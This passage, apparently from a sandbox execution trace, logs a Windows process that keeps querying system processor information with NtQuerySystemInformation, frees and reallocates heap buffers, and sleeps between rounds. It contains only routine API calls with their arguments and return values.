Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0176.588] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.589] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0176.589] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.589] Sleep (dwMilliseconds=0x110) [0176.665] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0176.665] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.665] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.666] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0176.666] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.666] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.667] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0176.667] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.667] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.668] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0176.668] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0176.669] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0176.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.671] Sleep (dwMilliseconds=0x110) [0176.822] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0176.822] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.823] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.823] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0176.823] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.824] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.825] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0176.825] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0176.826] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0176.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0176.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0176.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0176.828] Sleep (dwMilliseconds=0x110) [0177.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0177.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0177.005] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0177.006] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.007] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0177.007] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0177.007] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.008] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0177.009] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.009] Sleep (dwMilliseconds=0x110) [0177.068] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0177.068] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.069] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.069] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0177.069] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.070] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.070] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0177.070] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.071] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.072] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0177.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0177.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0177.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.079] Sleep (dwMilliseconds=0x110) [0177.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0177.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.302] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0177.302] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.303] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.303] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0177.304] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.304] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.304] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0177.305] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0177.309] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0177.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.312] Sleep (dwMilliseconds=0x110) [0177.349] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0177.350] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.350] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.351] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0177.351] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.351] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.352] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0177.352] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.353] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.353] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0177.353] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0177.354] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.354] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0177.355] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.355] Sleep (dwMilliseconds=0x110) [0177.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0177.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0177.365] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.365] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.365] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0177.366] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.366] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.366] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0177.367] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0177.367] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.367] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0177.368] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.368] Sleep (dwMilliseconds=0x110) [0177.417] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0177.417] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.418] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.419] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0177.419] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.419] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.420] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0177.420] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.421] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.421] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0177.421] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0177.422] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.422] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0177.423] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.423] Sleep (dwMilliseconds=0x110) [0177.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0177.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0177.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0177.473] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0177.473] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0177.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0177.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.475] Sleep (dwMilliseconds=0x110) [0177.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0177.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0177.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0177.536] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.537] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0177.537] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0177.538] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.538] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0177.539] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.539] Sleep (dwMilliseconds=0x110) [0177.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0177.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0177.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0177.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0177.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0177.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0177.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.645] Sleep (dwMilliseconds=0x110) [0177.761] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0177.761] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.761] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.762] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0177.762] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.763] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0177.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0177.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0177.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0177.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.767] Sleep (dwMilliseconds=0x110) [0177.786] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0177.786] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.787] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.788] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0177.788] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.789] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.789] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0177.789] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.790] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.790] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0177.790] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0177.791] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.791] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0177.792] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.792] Sleep (dwMilliseconds=0x110) [0177.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0177.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0177.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0177.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0177.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0177.801] HeapFree (in: hHeap=0x2560000, 